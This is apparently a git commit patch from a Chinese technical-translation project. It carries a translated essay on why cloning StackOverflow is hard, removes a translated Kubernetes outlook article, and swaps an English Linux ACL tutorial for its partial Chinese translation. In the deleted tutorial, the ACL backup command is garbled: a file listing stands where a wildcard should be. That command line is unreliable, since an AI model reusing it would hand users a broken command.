StackOverflow,虽然我知道你肯定是不会那样做的。我们假设你从设计程序,到敲代码,再到最终完成调试只需要区区十倍于抄袭 StackOverflow 源代码的时间。即使在这样的假设条件下,你也要耗费几周的时间昼夜不停得狂写代码。不知道你是否愿意,但是至少我可以欣然承认,如果只给我照抄源 StackOverflow 代码用时的十倍时间来让我自己写 StackOverflow, 我可是打死也做不到。 + +_好的_,我知道你在听到这些假设的时候已经开始觉得泄气了。*你在想,如果不是全部实现,而只是实现 StackOverflow **大部分** 的功能呢?这总归会容易很多了吧。* + +好的,问题是什么是 "大部分" 功能?如果只去实现提问和回答问题的功能?这个部分应该很简单吧。其实不然,因为实现问和答的功能还要求你必须做出一个对问题和其答案的投票系统,来显示大家对某个答案是赞同还是反对。因为只有这样你才能保证提问者可以得到这个问题的唯一的可信答案。当然,你还不能让人们赞同或者反对他们自己给出的答案,所以你还要去实现这种禁止自投自票的机制。除此之外,你需要去确保用户在一定的时间内不能赞同或反对其他用户太多次,以此来防止有人用机器人程序作弊乱投票。你很可能还需要去实现一个垃圾评论过滤器,即使这个过滤器很基础很简陋,你也要考虑如何去设计它。而且你恐怕还需要去支持用户图标(头像)的功能。并且你将不得不寻找一个自己真正信任的并且 +与 Markdown 接合很好的干净的 HTML 库(当然,假设你确实想要复用 StackOverflow 的 [那个超棒的编辑器][11] )。你还需要为所有控件购买或者设计一些小图标小部件,此外你至少需要实现一个基本的管理界面,以便那些喜欢捣鼓的用户可以调整和改动他们的个性化设置。并且你需要实现类似于 Karma 的声望累积系统,以便用户可以随着不断地使用来稳步提升他们的话语权和解锁更多的功能以及可操作性。 + +但是如果你实现了以上_所有_功能,可以说你_就已经_把要做的都做完了。 + +除非...除非你还要做全文检索功能。尤其是在“边问边搜”(动态检索)的特性中,支持全文检索是必不可少的。此外,录入和显示用户的基本信息,实现对问题答案的评论功能,以及实现一个显示热点提问的页面,以及热点问题和帖子随着时间推移沉下去的这些功能,都将是不可或缺的。另外你肯定还需要去实现回答奖励系统,并支持每个用户用多个不同的 OpenID 账户去登录,然后将这些相关的登陆事件通过邮件发送出去来通知用户,并添加一个标签或徽章系统,接着允许管理员通过一个不错的图形界面来配置这些标签和徽章(Badge)。你需要去显示用户的 Karma 历史,以及他们的历史点赞和差评。而且整个页面还需要很流畅的展开和拉伸,因为这个系统的页面随时都可能被 Slashdot,Reddit 或是 StackOverflow 这些动作影响到。 + +在这之后!你会以为你基本已经大功告成了! + +...为了产品的完整性,在上面所述的工作都完成之后,你又奋不顾身的去实现了升级功能,界面语言的国际化,Karma 值上限,以及让网站更专业的 CSS 设计,AJAX,还有那些看起来理所当然做起来却让人吐血的功能和特性。如果你不是真的动手来尝试做一个和 StackOverflow 一摸一样的系统,你肯定不会意识到在整个程序设计实施的过程中,你会踩到无数的鬼才会知道的大坑。 + +那么请你告诉我:如果你要做一个让人满意的类似产品出来,上述的哪一个功能是你可以省略掉的呢?哪些是“大部分”网站都具备的功能,哪些又不是呢? + +正因为这些很容易被忽视的问题,开发者才会以为做一个 StackOverflow 的仿制版产品会很简单。也同样是因为这些被忽视了的因素,开源软件才一直让人用起来很痛苦。很多软件开发人员在看到 StackOverflow 的时候,他们并不能察觉到 StackOverflow 产品的全貌。他们会简单的把 Stackoverflow 的实现抽象成下面一段逻辑和代码: + +``` +create table QUESTION (ID identity primary key, + TITLE varchar(255), --- 为什么我知道你认为是 255 + BODY text, + UPVOTES integer not null default 0, + DOWNVOTES integer not null default 0, + USER integer references USER(ID)); +create table RESPONSE (ID identity primary key, + BODY text, + UPVOTES integer not null default 0, + DOWNVOTES integer not null default 0, + QUESTION integer references QUESTION(ID)) +``` + +如果你让这些开发者去实现 StackOverflow,进入他脑海中的就是上面的两个 SQL 表和一个用以呈现表格数据的 HTML 文件。他们甚至会忽略数据的格式问题,进而单纯的以为他们可以在一个周末的时间里就把 StackOverflow 做出来。一些稍微老练的开发者可能会意识到他们还要去实现登陆和注销功能,评论功能,投票系统,但是仍然会自信的认为这不过也就是利用一个周末就能完成了;因为这些功能也不过意味着在后端多了几张 SQL 表和 HTML 文件。如果借助于 Django 之类的构架和工具,他们甚至可以直接拿来主义地不花一分钱就实现用户登陆和评论的功能。 + +但这种简单的实现却_远远不能_体现出 StackOverflow 的精髓。无论你对 StackOverflow 的感觉如何,大多数使用者似乎都同意 StackOverflow 的用户体验从头到尾都很流畅。使用 StackOverflow 的过程就是在跟一个精心打磨过的产品在愉快地交互。即使我没有深入了解过 StackOverflow ,我也能猜测出这个产品的成功和它数据库的 Schema 没有多大关系 - 实际上在有幸研读过 StackOverflow 的源码之后,我得以印证了自己的想法,StackOverflow 的成功确实和它的数据库设计关系甚小。真正让它成为一个极其易用的网站的原因,是它背后_大量的_精雕细琢的设计和实施。多数的开发人员在谈及仿制和克隆一款产品的难度时,真的_很少会去考虑到产品背后的打磨和雕琢工作_,因为他们认为_这些打磨和雕琢都是偶然的,甚至是无足轻重的。_ + +这就是为什么用开源工具去克隆和山寨 StackOverflow 其实是很容易失败的。即使这些开源开发者只是想去实现 StackOverflow 的主要的“规范和标准特性”,而非全面的高级特性,他们也会在实现的过程中遭遇种种关键和核心的问题,让他们阴沟翻船,半途而废。拿 Badge (徽章功能)来说,如果你要针对普通终端用户来设计 Badge , 则要么需要实现一个用户可用来个性化设置 bagdge 的 GUI,要么则取巧的设计出一个比较通用的 Badge 供所有的安装版本来使用。而开源设计的实际情况是,开发者会有很多的抱怨和牢骚,认为给 Badge 这种东西设计一个功能全面的 GUI 是根本不肯能的。而且他们会固执地把任何标准 badge 的提案踢回去,踢出第一宇宙速度,击穿地壳甩到地球的另一端。最终这些开发者还是会搞出一个类似于 Roundup 的 bug tracker 程序都在使用的流程和方案:即实现一个通用的机制, 提供以 Python 或 Php 为基础的一些系统API, 以便那些可以自如使用 Python 或 Php 的人可以轻松的通过这些编程接口来定制化他们自己的 Badge。而且老实说,PHP 和 Python 可是比任何可能的 GUI 接口都要好用和强大得多,为什么还要考虑 GUI 的方案呢?(出自开源开发者的想法) + +同样的,开源开发者会认为那些系统设置和管理员界面也一样可以省略掉。在他们看来,假如你是一个管理员,有 SQL 服务器的权限,那么你就理所当然的具备那些系统管理员该有的知识和技能。那么你其实可以使用 Djang-admin 或者任何类似的工具来轻松的对 StackOverflow 做很多设置和改造工作。毕竟如果你是一个 mods (懂如何mod的人)那么你肯定知道网站是怎么工作的,懂得如何利用专业工具去设置和改造一个网站。对啊!这不就得了! 毋庸置疑,在开源开发者重做他们自己的 StackOverflow 的时候,他们也不会把任何 StackOverflow 在接口上面的失败设计纠正过来。即使是原版 StackOverflow 里面最愚蠢最失败的那个设计(即要求用户必须拥有一个 OpenID 并知道如何使用它)在某个将来最终被 StackOverflow 删除和修正掉了, 我相信正在复制 StackOverflow 模式的那些开源克隆产品也还是会不假思索的把这个 OpenID 的功能仿制出来。这就好比是 GNOME 和 KDE 多年以来一直在做的事情,他们并没有把精力放在如何在设计之初就避免 Windows 的那些显而易见的毛病和问题,相反的确是在亦步亦趋的重复着 Windows 的设计,想办法用开源的方式做出一个比拟 Windows 功能的系统。 + + +开发者可能不会关心一个应用的上述设计细节,但是终端用户一定会。尤其是当他们在尝试去选择要使用哪个应用的时候,这些终端用户更会重视这些接口设计是否易用。就好像一家好的软件公司希望通过确保其产品在出货之前就有一流的质量,以降低售后维护支持的成本一样,懂行的消费者也会在他们购买这些产品之前就确保产品好用,以防在使用的时候不知所措,然后无奈的打电话给售后来解决问题。开源产品就失败在这里,而且相当之失败。一般来讲,付费软件则在这方面做得好很多。 + +这不是说开源软件没有自己的立足之地,这个博客就运行在 Apache,[Django][12],[PostgreSQL][13] 和 Linux 搭建的开源系统之上。但是让我来告诉你吧,配置这些堆栈可不是谁都可以做的。老版本的 PostgreSQL 需要手工配置 Vacuuming 来确保数据库的自动清理,而即使是最新版本的 ubuntu 和 FreeBSD 也仍然要求用户去手工配置他们的第一个数据库集群。 +相比之下,MS SQL (微软的 SQL) 则不需要你手工配置以上的任何一样东西。至于 Apache ... 我的天,Apache 简直复杂到让我根本来不及去尝试给一个新用户讲解我们如何可以通过一个一次性的安装过程就能把虚拟机,MovableType,几个 Diango apps 和 WordPress 配置在一起并流畅地使用。单单是给那些技术背景还不错但并非软件开发者的用户解释清楚 Apache 的那些针对多进程和多线程的设置参数就已经够我喝一壶的了。相比之下,微软的 IIS 7 或者是使用了 OS X 服务器的那个几乎闭源的 GUI 管理器的 Apache ,在配置的时候就要简单上不止一个数量级了。Django 确实是一个好的开源产品,但它也 _只是_ 一个基础构架,而并非是一个可以直接面向终端普通用户的商业产品。而开源真正的强项就 _恰恰在_ 这种基础构架的开发和创新上,这也正是驱使开发者为开源做贡献的最本真的动力。 + + +所以我的结论是,如果下次你再看到一个你喜欢的应用程序,请好好细心地揣摩一下这款产品,揣摩一下所有的那些针对用户的体贴入微的设计细节。而不是武断的认为你可以轻轻松松的再一周之内就用开源工具做一个和这个应用一摸一样的产品出来。那些认为制作和实现一个应用程序如此简单的人,十之八九都是因为忽略了软件开发的最终产品是要交给用户去用的。 + +------------------------------------------------------------------------------- + +via: https://bitquabit.com/post/one-which-i-call-out-hacker-news/ + +作者:[Benjamin Pollack][a] +译者:[hopefully2333](https://github.com/hopefully2333) +校对:[yunfengHe](https://github.com/yunfengHe) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://bitquabit.com/meta/about/ +[1]:http://www.cs.duke.edu/~ola/ +[2]:http://www.cs.duke.edu/courses/cps108/spring04/ +[3]:https://bitquabit.com/categories/programming +[4]:https://bitquabit.com/categories/technology +[5]:http://blog.bitquabit.com/2009/06/30/one-which-i-say-open-source-software-sucks/ +[6]:http://news.ycombinator.com/item?id=678501 +[7]:http://news.ycombinator.com/item?id=678704 +[8]:http://code.google.com/p/cnprog/ +[9]:http://code.google.com/p/soclone/ +[10]:http://en.wikipedia.org/wiki/Words_per_minute +[11]:http://github.com/derobins/wmd/tree/master +[12]:http://www.djangoproject.com/ +[13]:http://www.postgresql.org/ +[14]:https://bitquabit.com/post/one-which-i-call-out-hacker-news/ diff --git a/translated/tech/20171120 Containers and Kubernetes Whats next.md b/translated/tech/20171120 Containers and Kubernetes Whats next.md deleted file mode 100644 index 8e414a95dd..0000000000 --- a/translated/tech/20171120 Containers and Kubernetes Whats next.md +++ /dev/null @@ -1,80 +0,0 @@ -容器技术和 k8s 的下一站: -============================================================ -### 想知道容器编排管理和 K8s 的最新展望么?来看看专家怎么说。 - -![CIO_Big Data Decisions_2](https://enterprisersproject.com/sites/default/files/styles/620x350/public/images/CIO_Big%20Data%20Decisions_2.png?itok=Y5zMHxf8 "CIO_Big Data Decisions_2") - -如果你想对容器在未来的发展方向有一个整体把握,那么你一定要跟着钱走,看看钱都投在了哪里。当然了,有大量的资金正在投入容器的进一步发展。相关研究预计 2020 年容器技术的投入将占有 [27 亿美元][4] 的市场份额 。而在 2016 年,容器相关技术投入的总额为 7.62 亿美元,只有 2020 年投入预计的三分之一。巨额投入的背后是一些显而易见的基本因素,包括容器化的迅速增长以及并行化的大趋势。随着容器被大面积推广和使用,容器编排管理也会被理所当然的推广应用起来。 - -来自 [_The new stack_][5] 的调研数据表明,容器的推广使用是编排管理被推广的主要的催化剂。根据调研参与者的反馈数据,在已经将容器技术使用到生产环境中的使用者里,有六成正在将 kubernetes(k8s)编排管理广泛的应用在生产环境中,另外百分之十九的人员则表示他们已经处于部署 k8s 的初级阶段。在容器部署初期的使用者当中,虽然只有百分之五的人员表示已经在使用 K8s ,但是百分之五十八的人员表示他们正在计划和准备使用 K8s。总而言之,容器和 Kuebernetes 的关系就好比是鸡和蛋一样,相辅相成紧密关联。众多专家一致认为编排管理工具对容器的[长周期管理][6] 以及其在市场中的发展有至关重要的作用。正如 [Cockroach 实验室][7] 的 Alex Robinson 所说,容器编排管理被更广泛的拓展和应用是一个总体的大趋势。毫无疑问,这是一个正在快速演变的领域,且未来潜力无穷。鉴于此,我们对罗宾逊和其他的一些容器的实际使用和推介者做了采访,来从他们作为容器技术的践行者的视角上展望一下容器编排以及 k8s 的下一步发展。 - -### **容器编排将被主流接受** - -像任何重要技术的转型一样,我们就像是处在一个高崖之上一般,在经过了初期步履蹒跚的跋涉之后将要来到一望无际的广袤平原。广大的新天地和平实真切的应用需求将会让这种新技术在主流应用中被迅速推广,尤其是在大企业环境中。正如 Alex Robinson 说的那样,容器技术的淘金阶段已经过去,早期的技术革新创新正在减速,随之而来的则是市场对容器技术的稳定性和可用性的强烈需求。这意味着未来我们将不会再见到大量的新的编排管理系统的涌现,而是会看到容器技术方面更多的安全解决方案,更丰富的管理工具,以及基于目前主流容器编排系统的更多的新特性。 - -### **更好的易用性** - -人们将在简化容器的部署方面下大功夫,因为容器部署的初期工作对很多公司和组织来说还是比较复杂的,尤其是容器的[长期管理维护][8]更是需要投入大量的精力。正如 [Codemill AB][9] 公司的 My Karlsson 所说,容器编排技术还是太复杂了,这导致很多使用者难以娴熟驾驭和充分利用容器编排的功能。很多容器技术的新用户都需要花费很多精力,走很多弯路,才能搭建小规模的,单个的,被隔离的容器系统。这种现象在那些没有针对容器技术设计和优化的应用中更为明显。在简化容器编排管理方面有很多优化可以做,这些优化和改造将会使容器技术更加具有可用性。 - -### **在 hybrid cloud 以及 multi-cloud 技术方面会有更多侧重** - -随着容器和容器编排技术被越来越多的使用,更多的组织机构会选择扩展他们现有的容器技术的部署,从之前的把非重要系统部署在单一环境的使用情景逐渐过渡到更加[复杂的使用情景][10]。对很多公司来说,这意味着他们必须开始学会在 [hybrid cloud][11] 和 [muilti-cloud][12] 的环境下,全局化的去管理那些容器化的应用和微服务。正如红帽 [Openshift 部门产品战略总监][14] [Brian Gracely][13] 所说,容器和 k8s 技术的使用使得我们成功的实现了混合云以及应用的可移植性。结合 Open Service Broker API 的使用,越来越多的结合私有云和公有云资源的新应用将会涌现出来。 -据 [CloudBees][15] 公司的高级工程师 Carlos Sanchez 分析,联合服务(Federation)将会得到极大推动,使一些诸如多地区部署和多云部署等的备受期待的新特性成为可能。 - -**[ 想知道 CIO 们对 hybrid cloud 和 multi cloud 的战略构想么? 请参看我们的这条相关资源, **[**Hybrid Cloud: The IT leader's guide**][16]**. ]** - -### **平台和工具的持续整合及加强** - -对任何一种科技来说,持续的整合和加强从来都是大势所趋; 容器编排管理技术在这方面也不例外。来自 [Sumo Logic][17] 的首席分析师 Ben Newton 表示,随着容器化渐成主流,软件工程师们正在很少数的一些技术上做持续整合加固的工作,来满足他们的一些微应用的需求。容器和 K8s 将会毫无疑问的成为容器编排管理方面的主流平台,并轻松碾压其他的一些小众平台方案。因为 K8s 提供了一个相当清晰的可以摆脱各种特有云生态的途径,K8s 将被大量公司使用,逐渐形成一个不依赖于某个特定云服务的“中立云”(cloud-neutral)。 - -### **K8s 的下一站** - -来自 [Alcide][18] 的 CTO 和联合创始人 Gadi Naor 表示,k8s 将会是一个有长期和远景发展的技术,虽然我们的社区正在大力推广和发展 k8s,k8s 仍有很长的路要走。 -专家们对[日益流行的 k8s 平台][19]也作出了以下一些预测: - -**_来自 Alcide 的 Gadi Naor 表示:_** “运营商会持续演进并趋于成熟,直到在 k8s 上运行的应用可以完全自治。利用 [OpenTracing][20] 和诸如 [istio][21] 技术的 service mesh 架构,在 k8s 上部署和监控微应用将会带来很多新的可能性。” - -**_来自 Red Hat 的 Brian Gracely 表示:_** “k8s 所支持的应用的种类越来越多。今后在 k8s 上,你不仅可以运行传统的应用程序,还可以运行原生的云应用,大数据应用以及 HPC 或者基于 GPU 运算的应用程序,这将为灵活的架构设计带来无限可能。” - -**_来自 Sumo Logic 的 Ben Newton 表示:_** “随着 k8s 成为一个具有统治地位的平台,我预计更多的操作机制将会被统一化,尤其是 k8s 将和第三方管理和监控平台融合起来。” - -**_来自 CloudBees 的 Carlos Sanchez 表示:_** “在不久的将来我们就能看到不依赖于 Docker 而使用其他运行时环境的系统,这将会有助于消除任何可能的 lock-in 情景“ [小编提示:[CRI-O][22] 就是一个可以借鉴的例子。]“而且我期待将来会出现更多的针对企业环境的存储服务新特性,包括数据快照以及在线的磁盘容量的扩展。” - -**_来自 Cockroach Labs 的 Alex Robinson 表示:_** “ k8s 社区正在讨论的一个重大发展议题就是加强对[有状态程序][23]的管理。目前在 k8s 平台下,实现状态管理仍然非常困难,除非你所使用的云服务商可以提供远程固定磁盘。现阶段也有很多人在多方面试图改善这个状况,包括在 k8s 平台内部以及在外部服务商一端做出的一些改进。” - -------------------------------------------------------------------------------- - -via: https://enterprisersproject.com/article/2017/11/containers-and-kubernetes-whats-next - -作者:[Kevin Casey ][a] -译者:[yunfengHe](https://github.com/yunfengHe) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://enterprisersproject.com/user/kevin-casey -[1]:https://enterprisersproject.com/article/2017/11/kubernetes-numbers-10-compelling-stats -[2]:https://enterprisersproject.com/article/2017/11/how-enterprise-it-uses-kubernetes-tame-container-complexity -[3]:https://enterprisersproject.com/article/2017/11/5-kubernetes-success-tips-start-smart?sc_cid=70160000000h0aXAAQ -[4]:https://451research.com/images/Marketing/press_releases/Application-container-market-will-reach-2-7bn-in-2020_final_graphic.pdf -[5]:https://thenewstack.io/ -[6]:https://enterprisersproject.com/article/2017/10/microservices-and-containers-6-management-tips-long-haul -[7]:https://www.cockroachlabs.com/ -[8]:https://enterprisersproject.com/article/2017/10/microservices-and-containers-6-management-tips-long-haul -[9]:https://codemill.se/ -[10]:https://www.redhat.com/en/challenges/integration?intcmp=701f2000000tjyaAAA -[11]:https://enterprisersproject.com/hybrid-cloud -[12]:https://enterprisersproject.com/article/2017/7/multi-cloud-vs-hybrid-cloud-whats-difference -[13]:https://enterprisersproject.com/user/brian-gracely -[14]:https://www.redhat.com/en -[15]:https://www.cloudbees.com/ -[16]:https://enterprisersproject.com/hybrid-cloud?sc_cid=70160000000h0aXAAQ -[17]:https://www.sumologic.com/ -[18]:http://alcide.io/ -[19]:https://enterprisersproject.com/article/2017/10/how-explain-kubernetes-plain-english -[20]:http://opentracing.io/ -[21]:https://istio.io/ -[22]:http://cri-o.io/ -[23]:https://opensource.com/article/17/2/stateful-applications -[24]:https://enterprisersproject.com/article/2017/11/containers-and-kubernetes-whats-next?rate=PBQHhF4zPRHcq2KybE1bQgMkS2bzmNzcW2RXSVItmw8 -[25]:https://enterprisersproject.com/user/kevin-casey From 0afb24d49539fe8775c986f358ee2e7273d41401 Mon Sep 17 00:00:00 2001 From: darksun Date: Fri, 15 Dec 2017 21:53:18 +0800 Subject: [PATCH 0596/1627] =?UTF-8?q?=E7=BF=BB=E8=AF=91=E5=AE=8C=E6=AF=95?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...cific File or Folder In Linux Using ACL.md | 266 ------------------ ...cific File or Folder In Linux Using ACL.md | 259 +++++++++++++++++ 2 files changed, 259 insertions(+), 266 deletions(-) delete mode 100644 sources/tech/20171213 How To Allow-Permit User To Access A Specific File or Folder In Linux Using ACL.md create mode 100644 translated/tech/20171213 How To Allow-Permit User To Access A Specific File or Folder In Linux Using ACL.md diff --git a/sources/tech/20171213 How To Allow-Permit User To Access A Specific File or Folder In Linux Using ACL.md b/sources/tech/20171213 How To Allow-Permit User To Access A Specific File or Folder In Linux Using ACL.md deleted file mode 100644 index 30e70fe341..0000000000 --- a/sources/tech/20171213 How To Allow-Permit User To Access A Specific File or Folder In Linux Using ACL.md +++ /dev/null @@ -1,266 +0,0 @@ -translating by lujun9972 -tranlating by lujun9972 -How To Allow/Permit User To Access A Specific File or Folder In Linux Using ACL -====== -When you are come to file or folder permission part, you may first look owner/group/others permission. This can be done through chmod, chown, etc., commands. - -Files and directories have permission sets such as owner (owner or user of the file), group (associated group) and others. However, these permission sets have limitations and doesn't allow users to set different permissions to different users. - -By default Linux has following permission set for files & folders. - -`Files` -> 644 -> -rw-r-r- (User has Read & Write access, Group has Read only access, and Others also has Read only access) -`Folders` -> 755 -> drwxr-xr-x (User has Read, Write & Execute access, Group has Read & Execute access, and Others also has the same access) - -For example: By default users can access & edit their own home directory files, also can access associated group files but they can't modify those since group doesn't has write access and it's not advisable to permit group level. Also he/she can't access other users files. In some case multiple users want to access the same file, what will be the solution? - -I have user called `magi` and he wants to modify `httpd.conf` file? how to grant since it's owned by root user. Thus, Access Control Lists (ACLs) were implemented. - -### What Is ACL? - -ACL stands for Access Control List (ACL) provides an additional, more flexible permission mechanism for file systems. It is designed to assist with UNIX file permissions. ACL allows you to give permissions for any user or group to any disc resource. setfacl & getfacl commands help you to manage AcL without any trouble. - -### What Is setfacl? - -setfacl is used to sets Access Control Lists (ACLs) of files and directories. - -### What Is getfacl? - -getfacl - get file access control lists. For each file, getfacl displays the file name, owner, the group, and the Access Control List (ACL). If a directory has a default ACL, getfacl also displays the default ACL. - -### How to check whether ACL is enabled or not? - -Run `tune2fs` command to Check whether ACL is enabled or not. -``` -# tune2fs -l /dev/sdb1 | grep options -Default mount options: (none) - -``` - -The above output clearly shows that ACL is not enabled for `/dev/sdb1` partition. - -If acl is not listed then you will need to add acl as a mount option. To do so persistently, change the `/etc/fstab` line for `/app` to look like this. -``` -# more /etc/fstab - -UUID=f304277d-1063-40a2-b9dc-8bcf30466a03 / ext4 defaults 1 1 -/dev/sdb1 /app ext4 defaults,acl 1 1 - -``` - -Or alternatively, you can add this to the filesystem superblock by using the following command. -``` -# tune2fs -o +acl /dev/sdb1 - -``` - -Now, change the option in the current run-time without interruption by running the following command. -``` -# mount -o remount,acl /app - -``` - -Then run the tune2fs command again to see acl as an option. -``` -# tune2fs -l /dev/sdb1 | grep options -Default mount options: acl - -``` - -Yes, now i can see the ACLs option on `/dev/sdb1` partition. - -### How to check default ACL values - -To check the default ACL values for a file or directory, use the `getfacl` command followed by `/path to file` or `/path to folder`. Make a note, when you run getfacl command on non ACLs file or folder, it wont shows additional user and mask parameter values. -``` -# getfacl /etc/apache2/apache2.conf - -# file: etc/apache2/apache2.conf -# owner: root -# group: root -user::rw- -group::r-- -other::r-- - -``` - -### How to Set ACL for files - -Run the setfacl command with below format to set ACL on the given file. In the below example we are going to give a `rwx` access to `magi` user on the `/etc/apache2/apache2.conf` file. -``` -# setfacl -m u:magi:rwx /etc/apache2/apache2.conf - -``` - -**Details :** - - * **`setfacl:`** Command - * **`-m:`** modify the current ACL(s) of file(s) - * **`u:`** Indicate a user - * **`magi:`** Name of the user - * **`rwx:`** Permissions which you want to set - * **`/etc/apache2/apache2.conf:`** Name of the file - - - -Run the command once again to view the new ACL values. -``` -# getfacl /etc/apache2/apache2.conf - -# file: etc/apache2/apache2.conf -# owner: root -# group: root -user::rw- -user:magi:rwx -group::r-- -mask::rwx -other::r-- - -``` - -Make a note : If you noticed a plus (+) sign after the file or folder permissions then it's ACL setup. -``` -# ls -lh /etc/apache2/apache2.conf --rw-rwxr--+ 1 root root 7.1K Sep 19 14:58 /etc/apache2/apache2.conf - -``` - -### How to Set ACL for folders - -Run the setfacl command with below format to set ACL on the given folder recursively. In the below example we are going to give a `rwx` access to `magi` user on the `/etc/apache2/sites-available/` folder. -``` -# setfacl -Rm u:magi:rwx /etc/apache2/sites-available/ - -``` - -**Details :** - - * **`-R:`** Recurse into sub directories - - - -Run the command once again to view the new ACL values. -``` -# getfacl /etc/apache2/sites-available/ - -# file: etc/apache2/sites-available/ -# owner: root -# group: root -user::rwx -user:magi:rwx -group::r-x -mask::rwx -other::r-x - -``` - -Now, all the files and folders having ACLs values under `/etc/apache2/sites-available/` folder. -``` -# ls -lh /etc/apache2/sites-available/ -total 20K --rw-rwxr--+ 1 root root 1.4K Sep 19 14:56 000-default.conf --rw-rwxr--+ 1 root root 6.2K Sep 19 14:56 default-ssl.conf --rw-rwxr--+ 1 root root 1.4K Dec 8 02:57 mywebpage.com.conf --rw-rwxr--+ 1 root root 1.4K Dec 7 19:07 testpage.com.conf - -``` - -### How to Set ACL for group - -Run the setfacl command with below format to set ACL on the given file. In the below example we are going to give a `rwx` access to `appdev` group on the `/etc/apache2/apache2.conf` file. -``` -# setfacl -m g:appdev:rwx /etc/apache2/apache2.conf - -``` - -**Details :** - - * **`g:`** Indicate a group - - - -For multiple users and groups, just add `comma` between the users or group like below. -``` -# setfacl -m u:magi:rwx,g:appdev:rwx /etc/apache2/apache2.conf - -``` - -### How to remove ACL - -Run the setfacl command with below format to remove ACL for the given user on the file. This will remove only user permissions and keep `mask` values as read. -``` -# setfacl -x u:magi /etc/apache2/apache2.conf - -``` - -**Details :** - - * **`-x:`** Remove entries from the ACL(s) of file(s) - - - -Run the command once again to view the removed ACL values. In the below output i can see the `mask` values as read. -``` -# getfacl /etc/apache2/apache2.conf - -# file: etc/apache2/apache2.conf -# owner: root -# group: root -user::rw- -group::r-- -mask::r-- -other::r-- - -``` - -Use `-b` option to remove all ACLs associated to a file. -``` -# setfacl -b /etc/apache2/apache2.conf - -``` - -**Details :** - - * **`-b:`** Remove all extended ACL entries - - - -Run the command once again to view the removed ACL values. Here everything is gone and there is no mask value also. -``` -# getfacl /etc/apache2/apache2.conf - -# file: etc/apache2/apache2.conf -# owner: root -# group: root -user::rw- -group::r-- -other::r-- - -``` - -### How to Backup and Restore ACL - -Run the following command to backup and restore ACLs values. To take a backup, navigate to corresponding directory and do it. - -We are going to take a backup of `sites-available` folder. So, you have to do like below. -``` -# cd /etc/apache2/sites-available/ -# getfacl -R 20171202 docker - Use multi-stage builds.md comic core.md Dict.md lctt2014.md lctt2016.md LCTT翻译规范.md LICENSE published README.md sign.md sources translated 选题模板.txt 中文排版指北.md > acl_backup_for_folder - -``` - -To resote, run the following command. -``` -# setfacl --restore=/etc/apache2/sites-available/acl_backup_for_folder -``` - --------------------------------------------------------------------------------- - -via: https://www.2daygeek.com/how-to-configure-access-control-lists-acls-setfacl-getfacl-linux/ - -作者:[Magesh Maruthamuthu;Steven M. Dupuis][a] -译者:[lujun9972](https://github.com/lujun9972) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.2daygeek.com diff --git a/translated/tech/20171213 How To Allow-Permit User To Access A Specific File or Folder In Linux Using ACL.md b/translated/tech/20171213 How To Allow-Permit User To Access A Specific File or Folder In Linux Using ACL.md new file mode 100644 index 0000000000..794c813e15 --- /dev/null +++ b/translated/tech/20171213 How To Allow-Permit User To Access A Specific File or Folder In Linux Using ACL.md @@ -0,0 +1,259 @@ +使用ACL设置用户访问指定文件/目录的权限 +====== +当提到文件和目录的权限时,你的第一反应可能是 owner/group/others 权限。 这些权限可以通过 chmod, chown, 等命令来修改。 + +文件和目录都有 owner (文件所有者 ),group (所属组) 以及 others 权限,这些权限构成一个集合。 然而这些权限集合有它的局限性,无法做到为不同的用户设置不同的权限。 + +Linux 对文件和目录有以下默认权限。 + +`文件` -> 644 -> -rw-r-r- (所有者有读写权限,组成员有只读权限, 其他人也只有读权限) +`目录` -> 755 -> drwxr-xr-x (所有者有读,写和执行权限, 组成员有读和执行的权限, 其他人也有读和执行的权限) + +比如: 默认情况下,所有者可以访问和编辑他们自己用户主目录中的文件, 也可以访问相关同组人的文件,但他们不能修改这些文件,因为组成员没有写权限,而且让组成员有写权限也是不明智的。 基于同样的原因,他/她也不能修改其他人的文件。 然而在某些情况下,多个用户想要修改同一个文件, 那该怎么办呢? + +假设有个名叫 `magi` 的用户,他想要修改 `httpd.conf` 文件怎么办呢? 这个文件是归 root 用户所有的,这样如何授权呢? 为了解决这种情况, Access Control Lists (ACLs) 诞生了。 + +### 什么是 ACL? + +ACL 表示 Access Control List (ACL),它为文件系统提供了附加的,更具有弹性的权限机制。 它被设计来为补充 UNIX 文件权限机制。 ACL 允许你赋予任何某用户/组访问某项资源的权限。 setfacl 与 getfacl 命令会帮助你管理 ACL 而不会有任何麻烦。 + +### 什么是 setfacl? + +setfacl 用于设置文件和目录的访问控制列表 (Access Control Lists) (ACLs)。 + +### 什么 getfacl? + +getfacl - 获取文件访问控制列表。对于每个文件, getfacl 都会显示文件名, 文件所有者, 所属组, 以及访问控制列表 (ACL)。 如果一个目录有一个默认的 ACL, getfacl 也会显示这个默认的 ACL。 + +### 如何确认是否启用了 ACL? + +运行 `tune2fs` 命令来检查是否启用了 ACL。 +``` +# tune2fs -l /dev/sdb1 | grep options +Default mount options: (none) + +``` + +上面的输出很明显第说明 `/dev/sdb1` 分区没有启用 ACL。 + +如果结果中没有列出 acl,则你需要在挂载选项中加上 acl。 为了让它永久生效, 修改 `/etc/fstab` 中 `/app` 这一行成这样: +``` +# more /etc/fstab + +UUID=f304277d-1063-40a2-b9dc-8bcf30466a03 / ext4 defaults 1 1 +/dev/sdb1 /app ext4 defaults,acl 1 1 + +``` + +或者,你也可以使用下面命令将 acl 添加道文件系统的超级块中: +``` +# tune2fs -o +acl /dev/sdb1 + +``` + +现在,通过运行以下命令来动态修改选项: +``` +# mount -o remount,acl /app + +``` + +再次运行 tune2fs 命令来看选项中是否有 acl 了 +``` +# tune2fs -l /dev/sdb1 | grep options +Default mount options: acl + +``` + +嗯,现在 `/dev/sdb1` 分区中有 ACL 选项了。 + +### 如何查看默认的 ACL 值 + +要查看文件和目录默认的 ACL 值,可以使用 `getfacl` 命令后面加上 `文件路径` 或者 `目录路径`。 注意, 当你对非 ACL 文件/目录运行 getfacl 命令时, 则不会显示附加的 user 和 mask 参数值。 +``` +# getfacl /etc/apache2/apache2.conf + +# file: etc/apache2/apache2.conf +# owner: root +# group: root +user::rw- 